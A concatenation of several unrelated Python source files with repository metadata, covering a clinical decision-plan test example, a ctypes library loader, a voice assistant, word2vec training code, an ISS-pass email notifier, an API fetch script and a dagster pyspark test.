        actions=[PreRunStateAction(state=complex_plan.get_state("admission_state"), state_value="catheter_check")],
        algorithm=complex_plan.get_algorithm("catheter"),
        source=complex_plan.get_source("catheter"),
        decision=BinaryDecision(
            true_step=complex_plan.get_step("itu"),
            false_step=complex_plan.get_step("discharge")
        )
    ))
    from easul.source import ConstantSource
    complex_plan.add_source("catheter", ConstantSource(title="Catheter data", data={"systolic_bp": 80}))
    return complex_plan
def complex_plan_with_ml_no_metadata(tempdir):
    """Build the CAP+ML demo plan, writing the stored algorithm and visual
    metadata into `tempdir` (for tests that must not touch the packaged
    metadata files)."""
    plan = _complex_plan_with_ml()
    # Stored ML model is (re)built from diabetes_progression_algorithm and
    # cached at <tempdir>/diabetes.eal.
    plan.add_algorithm("progression", StoredAlgorithm(filename=tempdir + "/diabetes.eal",
                                                      title="Diabetes progression likelihood",
                                                      definition=diabetes_progression_algorithm
                                                      ))
    # Model-level and row-level visuals share the module-level element lists.
    plan.add_visual("model_scope", Visual(
        title="Diabetes model scope",
        algorithm=plan.get_algorithm("progression"),
        elements=model_scope_elements,
        metadata_filename=tempdir+"/test_model.eam",
        metadata_dataset="easul.tests.example.diabetes_progression_dataset"
    ))
    plan.add_visual("row_scope", Visual(
        title="Diabetes row scope",
        algorithm=plan.get_algorithm("progression"),
        elements=row_scope_elements,
        metadata_filename=tempdir + "/test_row.eam",
        metadata_dataset="easul.tests.example.diabetes_progression_dataset"
    ))
    return plan
def _complex_plan_with_ml():
    """Shared builder for the CAP plan extended with a diabetes-progression
    ML step (catheter check -> progression ML -> ITU/discharge).

    Callers register the "progression" algorithm and the "row_scope" visual
    *after* this function returns, yet get_algorithm("progression") and
    get_visual("row_scope") are called during construction below — Plan
    lookups are presumably resolved lazily. TODO(review): confirm against
    easul.plan.Plan.
    """
    from easul.decision import BinaryDecision
    from easul.plan import Plan
    from easul.state import State
    from easul.step import EndStep, StartStep, Step, AlgorithmStep, PreStep, VisualStep
    from easul.visual import Visual
    from easul.action import PreRunStateAction
    import os

    complex_plan_with_ml = Plan(title="CAP")
    # Workflow states updated as steps run.
    complex_plan_with_ml.add_state("admission_state", State(label="admission", default=None))
    complex_plan_with_ml.add_state("progression", State(label="progression", default=None))
    # Terminal steps.
    complex_plan_with_ml.add_step("discharge", EndStep(
        title="Discharge",
        actions=[PreRunStateAction(state=complex_plan_with_ml.get_state("admission_state"), state_value="discharged")]
    ))
    complex_plan_with_ml.add_step("itu", EndStep(
        title="ITU",
        actions=[PreRunStateAction(state=complex_plan_with_ml.get_state("admission_state"), state_value="itu")]
    ))
    complex_plan_with_ml.add_step("admission", StartStep(
        title="Patient admission",
        actions=[PreRunStateAction(state=complex_plan_with_ml.get_state("admission_state"), state_value="admitted")],
        next_step=complex_plan_with_ml.get_step("catheter_check")
    ))
    # Chart-only journey map. NOTE(review): unlike complex_plan(), JourneyMap
    # is not imported in this function — presumably a module-level import.
    complex_plan_with_ml.add_step("flowchart", Step(
        title="CAP logic map",
        visual=Visual(
            elements=[
                JourneyMap(route_only=False, start_step="admission")
            ]),
        exclude_from_chart=True
    ))
    complex_plan_with_ml.add_schema("catheter",
                                    DataSchema(
                                        schema={
                                            "systolic_bp": {"type": "number"},
                                            "score": {"type": "number"}
                                        },
                                        y_names=["score"]
                                    )
                                    )
    # Pre-steps that record the ML outcome before routing to a terminal step.
    complex_plan_with_ml.add_step("progression_low", PreStep(
        title="Diabetes progression low",
        actions=[PreRunStateAction(state=complex_plan_with_ml.get_state("progression"), state_value="low")],
        next_step=complex_plan_with_ml.get_step("discharge")
    ))
    complex_plan_with_ml.add_step("progression_high", PreStep(
        title="Diabetes progression high",
        actions=[PreRunStateAction(state=complex_plan_with_ml.get_state("progression"), state_value="high")],
        next_step=complex_plan_with_ml.get_step("itu")
    ))
    # ML step: runs the (caller-supplied) "progression" algorithm and stores
    # its result; the binary decision routes high/low.
    complex_plan_with_ml.add_step("progression_check", AlgorithmStep(
        algorithm=complex_plan_with_ml.get_algorithm("progression"),
        title="Progression ML",
        actions=[
            PreRunStateAction(state=complex_plan_with_ml.get_state("progression"), state_value="pending"),
            ResultStoreAction()
        ],
        decision=BinaryDecision(
            true_step=complex_plan_with_ml.get_step("progression_high"),
            false_step=complex_plan_with_ml.get_step("progression_low")
        ),
        source=complex_plan_with_ml.get_source("progression"),
        visual=complex_plan_with_ml.get_visual("row_scope")
    ))
    from easul.algorithm import ScoreAlgorithm, StoredAlgorithm
    # Simple rule-based score: one point for systolic BP over 90.
    complex_plan_with_ml.add_algorithm("catheter",
                                       ScoreAlgorithm(
                                           title="Catheter algorithm",
                                           schema=complex_plan_with_ml.get_schema("catheter"),
                                           factors=[
                                               OperatorFactor(title="High blood pressure", operator=operator.gt, input_field="systolic_bp", value=90,
                                                              penalty=1)]
                                       )
                                       )
    complex_plan_with_ml.add_step("catheter_check", AlgorithmStep(
        title="Catheter check",
        actions=[
            PreRunStateAction(state=complex_plan_with_ml.get_state("admission_state"), state_value="catheter_check")],
        algorithm=complex_plan_with_ml.get_algorithm("catheter"),
        source=complex_plan_with_ml.get_source("catheter"),
        decision=BinaryDecision(
            true_step=complex_plan_with_ml.get_step("progression_check"),
            false_step=complex_plan_with_ml.get_step("discharge")
        )
    ))
    from easul.source import ConstantSource
    # Constant data sources used by the algorithm steps.
    complex_plan_with_ml.add_source("catheter", ConstantSource(title="Catheter data", data={"systolic_bp": 80}))
    complex_plan_with_ml.add_source("progression", ConstantSource(title="Diabetes progression data", data={}))
    # NOTE(review): this re-registers the "flowchart" key added above,
    # replacing the "CAP logic map" title with "Diabetes logic map" — looks
    # like a copy/paste leftover; confirm which title is intended.
    complex_plan_with_ml.add_step("flowchart", Step(
        title="Diabetes logic map",
        visual=Visual(
            elements=[
                JourneyMap(route_only=False, start_step="admission")
            ]),
        exclude_from_chart=True
    ))
    return complex_plan_with_ml
def complex_plan_with_ml():
    """Build the CAP+ML demo plan using the packaged example metadata files.

    NOTE(review): the "overview" step fetches the "model_scope" visual before
    add_visual registers it — presumably Plan lookups resolve lazily; confirm
    against easul.plan.Plan.
    """
    plan = _complex_plan_with_ml()
    # Stored ML model, rebuilt from diabetes_progression_algorithm if the
    # packaged .eal file is missing.
    plan.add_algorithm("progression", StoredAlgorithm(filename=EXAMPLE_PATH + "/metadata/diabetes.eal",
                                                      title="Diabetes progression likelihood",
                                                      definition=diabetes_progression_algorithm
                                                      ))
    plan.add_step("overview", VisualStep(
        title="Model",
        visual=plan.get_visual("model_scope")
    ))
    plan.add_visual("model_scope", Visual(
        title="Diabetes model scope",
        algorithm=plan.get_algorithm("progression"),
        elements=model_scope_elements,
        metadata_filename=EXAMPLE_PATH + "/metadata/model_scope.emd",
        metadata_dataset="easul.tests.example.diabetes_progression_dataset"
    ))
    plan.add_visual("row_scope", Visual(
        title="Diabetes row scope",
        algorithm=plan.get_algorithm("progression"),
        elements=row_scope_elements,
        metadata_filename=EXAMPLE_PATH + "/metadata/row_scope.emd",
        metadata_dataset="easul.tests.example.diabetes_progression_dataset"
    ))
    return plan
# Input schema for the CURB-65 score; `score` is the target column.
curb65_schema = DataSchema(
    schema={
        "confusion": {"type": "boolean", "required": True},
        "urea": {"type": "number", "required": True},
        "rr": {"type": "number", "required": True},
        "sbp": {"type": "number", "required": True},
        "dbp": {"type": "number", "required": True},
        "age": {"type": "number", "required": True},
        "score": {"type": "number", "required": True}
    }, y_names=["score"])

# Sample diabetes feature rows: one expected to predict progression, one not.
prog_input_data = {"age": 59, "sex": 2, "bmi": 32.1, "bp": 101, "s1": 157, "s2": 93.2, "s3": 38, "s4": 4, "s5": 4.9,
                   "s6": 87}
no_prog_input_data = {"age": 23, "sex": 1, "bmi": 20.1, "bp": 78, "s1": 77, "s2": 93.2, "s3": 38, "s4": 4, "s5": 4.9,
                      "s6": 37}
def curb65_score_algorithm():
    """Construct the CURB-65 severity score as an easul ScoreAlgorithm.

    One point each for: confusion, urea > 19, respiratory rate >= 30,
    low blood pressure (SBP < 90 or DBP <= 60), and age >= 65.
    """
    from easul.algorithm import logic, factor
    from easul import expression
    import operator

    # Low blood pressure is a compound condition: either systolic below 90
    # or diastolic at/below 60 earns the point.
    low_bp = factor.ExpressionFactor(
        penalty=1,
        expression=expression.OrExpression(
            expressions=[
                expression.OperatorExpression(operator=operator.lt, value=90, input_field="sbp"),
                expression.OperatorExpression(operator=operator.le, value=60, input_field="dbp"),
            ]
        ),
        title="Low blood pressure",
    )
    scoring_factors = [
        factor.OperatorFactor(penalty=1, operator=operator.eq, value=1, input_field="confusion", title="Confusion"),
        factor.OperatorFactor(penalty=1, operator=operator.gt, value=19, input_field="urea", title="High urea"),
        factor.OperatorFactor(penalty=1, operator=operator.ge, value=30, input_field="rr", title="High respiratory rate"),
        low_bp,
        factor.OperatorFactor(penalty=1, operator=operator.ge, value=65, input_field="age", title="Age >= 65"),
    ]
    return logic.ScoreAlgorithm(
        title="CURB65",
        factors=scoring_factors,
        schema=curb65_schema,
        start_score=0,
    )
| rcfgroup/easul | easul/tests/example.py | example.py | py | 21,533 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "os.path.dirname",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 23,
"usage_type": "attribute"
},
{
"api_name": "easul.algorithm.ClassifierAlgorithm",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "skle... |
7341734490 | import sys
import os
import ctypes
from ctypes import (
c_double,
c_int,
c_float,
c_char_p,
c_int32,
c_uint32,
c_void_p,
c_bool,
POINTER,
_Pointer, # type: ignore
Structure,
Array,
c_uint8,
c_size_t,
)
import pathlib
from typing import List, Union
# Load the library
def _load_shared_library(lib_base_name: str):
# Construct the paths to the possible shared library names
_base_path = pathlib.Path(__file__).parent.resolve()
# Searching for the library in the current directory under the name "libllama" (default name
# for llamacpp) and "llama" (default name for this repo)
_lib_paths: List[pathlib.Path] = []
# Determine the file extension based on the platform
if sys.platform.startswith("linux"):
_lib_paths += [
_base_path / f"lib{lib_base_name}.so",
]
elif sys.platform == "darwin":
_lib_paths += [
_base_path / f"lib{lib_base_name}.so",
_base_path / f"lib{lib_base_name}.dylib",
]
elif sys.platform == "win32":
_lib_paths += [
_base_path / f"{lib_base_name}.dll",
]
else:
raise RuntimeError("Unsupported platform")
cdll_args = dict() # type: ignore
# Add the library directory to the DLL search path on Windows (if needed)
# Try to load the shared library, handling potential errors
for _lib_path in _lib_paths:
print("_lib_path = ", _lib_path)
if _lib_path.exists():
try:
return ctypes.CDLL(str(_lib_path), **cdll_args)
except Exception as e:
raise RuntimeError(f"Failed to load shared library '{_lib_path}': {e}")
raise FileNotFoundError(
f"Shared library with base name '{lib_base_name}' not found"
)
# Specify the base name of the shared library to load (resolved to
# e.g. libmodel.so / model.dll next to this file).
_lib_base_name = "model"

# Load the library once at import time.
_lib = _load_shared_library(_lib_base_name)


# Thin ctypes wrapper over the C `inference` entry point; `argv` is a
# UTF-8 encoded checkpoint path passed through as char*.
def inference(argv: c_char_p):
    return _lib.inference(argv)

#_lib.inference.argtypes = [c_int, c_char_p]
_lib.inference.restype = c_char_p

if __name__ == "__main__":
    inference(bytes( "stories15M.bin", encoding = 'utf-8'))
| mengbingrock/shepherd | shepherd/llama2c_py/llama2c_py.py | llama2c_py.py | py | 2,276 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pathlib.Path",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "typing.List",
"line_number": 32,
"usage_type": "name"
},
{
"api_name": "pathlib.Path",
"line_number": 32,
"usage_type": "attribute"
},
{
"api_name": "sys.platform.startswith",
... |
31418095220 | from Word2Vec.Word2VecGenerator import Word2VecGenerator
import glob
from JsonParse.JsonParser import JsonParser
import json as Json
class TrainingComponentGenerator:
    """Builds word2vec training components — a Code2Vec model, an AST2Vec
    model and an AST-node dictionary — from commit JSON files produced
    upstream."""

    # Longest tokenized source-code sentence seen so far.
    __largest_n_words = 0
    # Vector size for the AST-node word2vec model.
    __astNode2Vec_size = 0
    # Vector size for the source-code word2vec model.
    __number_of_vector_code2vec = 0

    def __init__(self, astNode2Vec_size, number_of_vector_code2vec):
        self.__astNode2Vec_size = astNode2Vec_size
        self.__number_of_vector_code2vec = number_of_vector_code2vec

    def generateTrainingComponent(self, dataFolderPath):
        """Read every commit JSON matching the glob pattern `dataFolderPath`,
        train both word2vec models, and write the de-duplicated AST-node
        dictionary to Outcome/Models/AstNodeDictionary.json."""
        dataset = []
        for file in glob.glob(dataFolderPath):
            dataset.append(file)
        commits = list()
        parser = JsonParser()
        # Each JSON file holds a list of commits; flatten them all together.
        for data in dataset:
            json = parser.openJson(data)
            commitData = json
            commits.extend(commitData)
        astSentences = list()
        sourceCodeSentences = list()
        astNodeDict = list()
        for commit in commits:
            self.__collectWord2VecData(commit, sourceCodeSentences, astSentences, astNodeDict)
        self.__word2vecModelGenerate(sourceCodeSentences, astSentences)
        astNodeDictSet = set(astNodeDict)  # de-duplicate node names
        astNodeDict = list(astNodeDictSet)
        jsonString = Json.dumps(astNodeDict)
        with open('Outcome/Models/AstNodeDictionary.json', 'w') as f:
            f.write(jsonString)
        print("Training Components are built")

    def __collectWord2VecData(self, commit, sourceCodeSentences, astSentences, astNodeDict):
        """Append one commit's AST sentences, tokenized source sentences and
        AST-node names to the given accumulator lists, tracking the longest
        source sentence seen."""
        tasks = commit['tasks']
        commitAstNodeDic = commit['astNodeDic']
        astNodeDict.extend(commitAstNodeDic)
        for task in tasks:
            taskElementTreeSet = task['taskElementTreeSet']
            for taskElement in taskElementTreeSet:
                astNodeSentence = taskElement['astNodeSentence']
                astNodeSenAsList = self.__stringToList(astNodeSentence)
                astSentences.append(astNodeSenAsList)
                sourceCode = taskElement['sourceCode']
                sourceCodeAsList = self.__tokenizedCodes(sourceCode)
                sourceCodeSentences.append(sourceCodeAsList)
                # Track the maximum sentence length (exposed via
                # getMaximumNumberOfWord, e.g. for padding downstream).
                if (self.__largest_n_words < len(sourceCodeAsList)):
                    self.__largest_n_words = len(sourceCodeAsList)

    def __word2vecModelGenerate(self, sourceCodeSentences, astSentences):
        """Train and persist the Code2Vec and AST2Vec models; returns both."""
        # CODE2VEC
        code2Vec = Word2VecGenerator()
        code2Vec.generateModel(sourceCodeSentences, vector_size=self.__number_of_vector_code2vec, window=4, min_count=1,
                               Type='CodeType')
        print("Code2Vec is generated")
        # AST2Vec
        astNode2Vec = Word2VecGenerator()
        astNode2Vec.generateModel(astSentences, vector_size=self.__astNode2Vec_size, window=2, min_count=1,
                                  Type="AstType")
        print("AST2Vec is generated")
        return astNode2Vec, code2Vec

    def __stringToList(self, string):
        """Split a space-separated sentence into a token list."""
        listRes = list(string.split(" "))
        return listRes

    def __tokenizedCodes(self, sourceCode):
        """Tokenize source code on spaces, dropping empty tokens."""
        sourceCodeAsList = self.__stringToList(sourceCode)
        sourceCodeAsList = [x for x in sourceCodeAsList if x != '']
        return sourceCodeAsList

    def getMaximumNumberOfWord(self):
        """Length of the longest tokenized source sentence processed so far."""
        return self.__largest_n_words
| ZzillLongLee/TsGen | TrainingDataGenerator/TrainingComponentGenerator.py | TrainingComponentGenerator.py | py | 3,300 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "glob.glob",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "JsonParse.JsonParser.JsonParser",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "json.dumps",
"line_number": 38,
"usage_type": "call"
},
{
"api_name": "Word2Vec.Word2Ve... |
23497341801 | ################ Henri Lahousse ################
# voice assistant
# 05/31/2022
# libraries
import struct
import pyaudio
import pvporcupine # for wakeword
import pvrhino # for situations
# Module-level handles, populated inside voice_ass().
porcupine = None
pa = None
audio_stream = None
rhino = None
# documentation: https://picovoice.ai/docs/
# wake-word models: https://console.picovoice.ai/ppn
# situation (context) models: https://console.picovoice.ai/rhn

# Personal key from https://console.picovoice.ai/access_key
# SECURITY: never commit a real access key to source control.
access_key = 'ENTER_KEY'
def voice_ass():
    """Blocking voice-assistant loop built on Picovoice.

    Streams microphone audio into a Porcupine wake-word engine and three
    Rhino speech-to-intent engines; returns 1 when the wake word is heard.
    """
    porcupine = pvporcupine.create(
        access_key=access_key,
        keyword_paths=['ENTER_PATH']  # wake-word model (.ppn) exported from the Picovoice console
    )

    # Build a Rhino speech-to-intent engine for one context file (.rhn).
    def setup(path):
        rhino = pvrhino.create(
            access_key=access_key,
            context_path=path)
        return rhino

    rhino_drive = setup('ENTER_PATH')  # "drive" context model (.rhn)
    rhino_roof = setup('ENTER_PATH')  # "roof" context model (.rhn)
    rhino_smartlights = setup('ENTER_PATH')  # "smart lights" context model (.rhn)
    pa = pyaudio.PyAudio()
    # Microphone stream framed for Porcupine (wake-word) processing.
    audio_stream = pa.open(
        rate=porcupine.sample_rate,
        channels=1,
        format=pyaudio.paInt16,
        input=True,
        frames_per_buffer=porcupine.frame_length)

    # Open a microphone stream framed for a given Rhino engine.
    def audio(rhino):
        audio_stream_rhn = pa.open(
            rate=rhino.sample_rate,
            channels=1,
            format=pyaudio.paInt16,
            input=True,
            frames_per_buffer=rhino.frame_length)
        return audio_stream_rhn

    audio_sm = audio(rhino_smartlights)
    audio_rf = audio(rhino_roof)
    audio_dr = audio(rhino_drive)
    while True:
        # One frame of PCM audio for the wake-word engine.
        pcm = audio_stream.read(porcupine.frame_length)
        pcm = struct.unpack_from("h" * porcupine.frame_length, pcm)
        keyword_index = porcupine.process(pcm)

        # Feed one frame to a Rhino engine; True when an inference is ready.
        def fin(aud, rhino):
            rh = aud.read(rhino.frame_length)
            rh = struct.unpack_from("h" * rhino.frame_length, rh)
            is_finalized = rhino.process(rh)
            return is_finalized

        is_fin_sm = fin(audio_sm, rhino_smartlights)
        is_fin_rf = fin(audio_rf, rhino_roof)
        is_fin_dr = fin(audio_dr, rhino_drive)

        # Extract (intent, slots) from a finalized, understood inference.
        def rs(is_fin, rhino):
            if is_fin:
                inference = rhino.get_inference()  # only valid once finalized
                if inference.is_understood:
                    intent = inference.intent  # intent is a string
                    slots = inference.slots  # slots is a dictionary
                    return intent, slots

        # Wake word detected -> signal the caller.
        if keyword_index == 0:
            return 1
        rs(is_fin_sm, rhino_smartlights)
        rs(is_fin_rf, rhino_roof)
        rs(is_fin_dr, rhino_drive)
    # NOTE(review): unreachable — the loop above only exits via `return 1`,
    # so these engines are never released; `rhino` here is also the
    # module-level None. TODO confirm the intended cleanup path.
    porcupine.delete()
    rhino.delete()
| lahousse/ONWARD | software/voice-assistant/voice-assis.py | voice-assis.py | py | 3,324 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pvporcupine.create",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "pvrhino.create",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "pyaudio.PyAudio",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "pyaudio.paInt16",
... |
26336618129 | import datetime
import smtplib
import time
import requests
import api_keys
# Observer coordinates (London) used for both proximity and daylight checks.
MY_LAT = 51.53118881973776
MY_LONG = -0.08949588609011068

# One-shot fetch of the current ISS position at startup.
response = requests.get(url="http://api.open-notify.org/iss-now.json")
data = response.json()
longitude = data["iss_position"]["longitude"]
latitude = data["iss_position"]["latitude"]
print(latitude, longitude)

parameters = {
    "lat": MY_LAT,
    "lng": MY_LONG,
    "formatted": 0
}

# Sunrise/sunset hours for the observer; with formatted=0 the API returns
# ISO-8601 timestamps — presumably UTC. TODO(review): confirm timezone
# handling versus the local-time comparison in is_night().
response = requests.get(url=f"https://api.sunrise-sunset.org/json", params=parameters)
data = response.json()
sunrise = int(data["results"]["sunrise"].split("T")[1].split(":")[0])
sunset = int(data["results"]["sunset"].split("T")[1].split(":")[0])
def is_nearby():
    """Return True when the ISS is within +/-5 degrees of the observer's
    latitude and longitude (module-level globals)."""
    # Chained comparisons replace the redundant `if cond: return True else False`.
    return (MY_LAT - 5 <= float(latitude) <= MY_LAT + 5) and \
        (MY_LONG - 5 <= float(longitude) <= MY_LONG + 5)
def is_night():
    """Return True when the current hour is after sunset or before sunrise
    (module-level hours parsed from the sunrise-sunset API)."""
    now = datetime.datetime.now().hour
    # Boolean expression replaces the redundant `if cond: return True else False`.
    return now >= sunset or now <= sunrise
# Every minute: if the ISS is overhead and it is dark, email a notification.
while True:
    time.sleep(60)
    if is_nearby() and is_night():
        # A fresh SMTP session per notification; credentials come from the
        # local api_keys module.
        with smtplib.SMTP(host="smtp.gmail.com") as conn:
            conn.starttls()
            conn.login(user=api_keys.my_email, password=api_keys.password)
            conn.sendmail(from_addr=api_keys.my_email, to_addrs=api_keys.my_email, msg="update \n\nis nearby")
{
"api_name": "requests.get",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "datetime.datetime.now",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
... |
70387249063 | from aplication.models import historical_record
from aplication.dto.dto_record import dto_record
import datetime as dt
def register(_record:dto_record):
    """Persist a new active historical_record for the given turn, stamped
    with the current date and time."""
    entry = historical_record()
    entry.registration_date = dt.date.today()
    entry.registration_time = dt.datetime.now().strftime('%H:%M:%S')
    entry.turn = _record.turn
    entry.active = True
    entry.save()
| GustavoRosario/pass | pj/aplication/controles/record.py | record.py | py | 414 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "aplication.dto.dto_record.dto_record",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "aplication.models.historical_record",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "datetime.date.today",
"line_number": 7,
"usage_type": "call"
},
... |
31329677612 | import requests
from requests import HTTPError
import yaml
import json
import os
def load_config():
    """Read api_config.yaml from the current working directory and return
    its parsed contents as a dict."""
    config_file = os.path.join(os.getcwd(), 'api_config.yaml')
    with open(config_file, mode='r') as yaml_file:
        return yaml.safe_load(yaml_file)
def auth():
    """Authenticate against the API and hand the JWT to request().

    Reads credentials from the 'api_handle' config section, POSTs them to
    the auth endpoint and, on success, returns request(token). On HTTP
    failure it logs the endpoint and returns None.
    """
    conf = load_config()['api_handle']
    url = conf['url']+conf['endpoint_auth']
    data = json.dumps(conf['credentials'])
    headers = {"content-type": "application/json"}
    try:
        result = requests.post(url, data=data, headers=headers)
        result.raise_for_status()
        token = "JWT " + result.json()['access_token']
        return request(token)
    except HTTPError:
        print('Exception with:')
        # BUG FIX: the config has no 'endpoint' key, so the original
        # conf['endpoint'] raised KeyError *inside* the error handler.
        # Report the auth endpoint that actually failed.
        print(conf['url']+conf['endpoint_auth'])
def get(url, date, headers):
    """Fetch out-of-stock items for one date; returns the parsed JSON body,
    or None when an HTTPError is raised."""
    payload = json.dumps({"date": date})
    try:
        response = requests.get(url, data=payload, headers=headers, timeout=10)
        return response.json()
    except HTTPError:
        print('Error')
def save(inp):
    """Write the fetched records to data/<date>/out_<date>.json under the
    current working directory, creating the directory if needed.

    `inp` is a list of dicts; the first record's 'date' names the folder
    and the output file.
    """
    date_name = inp[0]['date']
    target_dir = os.path.join(os.getcwd(), f'data/{date_name}')
    if not os.path.exists(target_dir):
        try:
            os.makedirs(target_dir)
        except OSError:
            print("Creation of the directory %s failed" % target_dir)
        else:
            print("Successfully created the directory %s" % target_dir)
    with open(f'{target_dir}/out_{date_name}.json', 'w') as json_file:
        json.dump(inp, json_file)
def request(token):
    """Fetch out-of-stock data for the configured start date and save it.

    BUG FIX: the original tested `result` for the "no items" message
    *before* calling the API (while result was still None), so the check
    could never fire and an empty-date response would be passed to save().
    The result is now fetched first, then inspected; .get() also avoids a
    KeyError when a dict response lacks 'message'.
    """
    conf = load_config()['api_handle']
    url = conf['url'] + conf['endpoint_get']
    start_date = conf['start_date']
    headers = conf['headers']
    headers['authorization'] = token
    result = get(url, start_date, headers)
    if isinstance(result, dict) \
            and (result.get('message') == 'No out_of_stock items for this date'):
        print('Empty Date')
    else:
        save(result)
if __name__ == '__main__':
auth()
| daniiche/DE | hmwrk4/airflow/dags/api_handle_airflow.py | api_handle_airflow.py | py | 1,987 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.path.join",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "os.getcwd",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "yaml.safe_load",
"line_number... |
496206437 | import os
import pytest
from dagster_aws.emr import EmrJobRunner, emr_pyspark_resource
from dagster_pyspark import pyspark_resource, pyspark_solid
from moto import mock_emr
from dagster import (
DagsterInvalidDefinitionError,
ModeDefinition,
RunConfig,
execute_pipeline,
pipeline,
)
from dagster.seven import mock
from dagster.utils.test import create_test_pipeline_execution_context
@pyspark_solid
def example_solid(context):
    """Parallelize a tiny (name, age) dataset on the configured Spark
    context and log the first two records."""
    people = [('John', 19), ('Jennifer', 29), ('Adam', 35), ('Henry', 50)]
    people_rdd = context.resources.pyspark.spark_context.parallelize(people)
    for name, age in people_rdd.take(2):
        context.log.info('%s: %d' % (name, age))
@pyspark_solid(name='blah', description='this is a test', config={'foo': str, 'bar': int})
def other_example_solid(context):
    """Same Spark demo as example_solid, registered under the name 'blah'
    with a custom config schema."""
    people = [('John', 19), ('Jennifer', 29), ('Adam', 35), ('Henry', 50)]
    people_rdd = context.resources.pyspark.spark_context.parallelize(people)
    for name, age in people_rdd.take(2):
        context.log.info('%s: %d' % (name, age))
@pipeline(
    mode_defs=[
        # 'prod' submits work to EMR; 'local' runs on an in-process Spark.
        ModeDefinition('prod', resource_defs={'pyspark': emr_pyspark_resource}),
        ModeDefinition('local', resource_defs={'pyspark': pyspark_resource}),
    ]
)
def example_pipe():
    # Pipeline of two independent pyspark solids.
    example_solid()
    other_example_solid()
def test_local():
    """example_pipe should succeed end-to-end in 'local' (in-process Spark) mode."""
    pipeline_result = execute_pipeline(
        example_pipe,
        environment_dict={'solids': {'blah': {'config': {'foo': 'a string', 'bar': 123}}}},
        run_config=RunConfig(mode='local'),
    )
    assert pipeline_result.success
@mock_emr
@mock.patch('dagster_aws.emr.emr.EmrJobRunner.wait_for_steps_to_complete')
def test_pyspark_emr(mock_wait):
    """Run example_pipe in 'prod' mode against a moto-mocked EMR cluster,
    with step completion patched out so no real work is awaited."""
    run_job_flow_args = dict(
        Instances={
            'InstanceCount': 1,
            'KeepJobFlowAliveWhenNoSteps': True,
            'MasterInstanceType': 'c3.medium',
            'Placement': {'AvailabilityZone': 'us-west-1a'},
            'SlaveInstanceType': 'c3.xlarge',
        },
        JobFlowRole='EMR_EC2_DefaultRole',
        LogUri='s3://mybucket/log',
        Name='cluster',
        ServiceRole='EMR_DefaultRole',
        VisibleToAllUsers=True,
    )

    # Doing cluster setup outside of a solid here, because run_job_flow is not yet plumbed through
    # to the pyspark EMR resource.
    job_runner = EmrJobRunner(region='us-west-1')
    context = create_test_pipeline_execution_context()
    cluster_id = job_runner.run_job_flow(context, run_job_flow_args)

    result = execute_pipeline(
        example_pipe,
        environment_dict={
            'solids': {'blah': {'config': {'foo': 'a string', 'bar': 123}}},
            'resources': {
                'pyspark': {
                    'config': {
                        'pipeline_file': __file__,
                        'pipeline_fn_name': 'example_pipe',
                        'cluster_id': cluster_id,
                        'staging_bucket': 'dagster-scratch-80542c2',
                        'region_name': 'us-west-1',
                    }
                }
            },
        },
        run_config=RunConfig(mode='prod'),
    )
    assert result.success
    # BUG FIX: `assert mock_wait.called_once` accessed an auto-created Mock
    # attribute, which is always truthy — the assertion could never fail.
    # Use the real assertion helper instead.
    mock_wait.assert_called_once()
def test_bad_requirements_txt():
    """A nonexistent requirements file must be rejected at definition time."""
    with pytest.raises(DagsterInvalidDefinitionError) as exc_info:
        execute_pipeline(
            example_pipe,
            environment_dict={
                'solids': {'blah': {'config': {'foo': 'a string', 'bar': 123}}},
                'resources': {
                    'pyspark': {
                        'config': {
                            'requirements_file_path': 'DOES_NOT_EXIST',
                            'pipeline_file': __file__,
                            'pipeline_fn_name': 'example_pipe',
                            'cluster_id': 'some_cluster_id',
                            'staging_bucket': 'dagster-scratch-80542c2',
                            'region_name': 'us-west-1',
                        }
                    }
                },
            },
            run_config=RunConfig(mode='prod'),
        )
    assert 'The requirements.txt file that was specified does not exist' in str(exc_info.value)

    # We have to manually stop the pyspark context here because we interrupted before resources
    # were cleaned up, and so stop() was never called on the spark session.
    from pyspark.sql import SparkSession

    SparkSession.builder.getOrCreate().stop()
@pytest.mark.skip
def test_do_it_live_emr():
    """Manual/live test (skipped in CI): runs 'prod' mode against a real EMR
    cluster identified by the AWS_EMR_JOB_FLOW_ID environment variable."""
    result = execute_pipeline(
        example_pipe,
        environment_dict={
            'solids': {'blah': {'config': {'foo': 'a string', 'bar': 123}}},
            'resources': {
                'pyspark': {
                    'config': {
                        'pipeline_file': __file__,
                        'pipeline_fn_name': 'example_pipe',
                        'cluster_id': os.environ.get('AWS_EMR_JOB_FLOW_ID'),
                        'staging_bucket': 'dagster-scratch-80542c2',
                        'region_name': 'us-west-1',
                    }
                }
            },
        },
        run_config=RunConfig(mode='prod'),
    )
    assert result.success
| helloworld/continuous-dagster | deploy/dagster_modules/libraries/dagster-aws/dagster_aws_tests/emr_tests/test_pyspark.py | test_pyspark.py | py | 5,158 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "dagster_pyspark.pyspark_solid",
"line_number": 19,
"usage_type": "name"
},
{
"api_name": "dagster_pyspark.pyspark_solid",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "dagster.pipeline",
"line_number": 37,
"usage_type": "call"
},
{
"api_... |
5232319809 | from openpyxl import Workbook
wb = Workbook()
ws = wb.active

# [Final grade data recorded so far]
# Columns: student no., attendance, quiz1, quiz2, midterm, final, project.
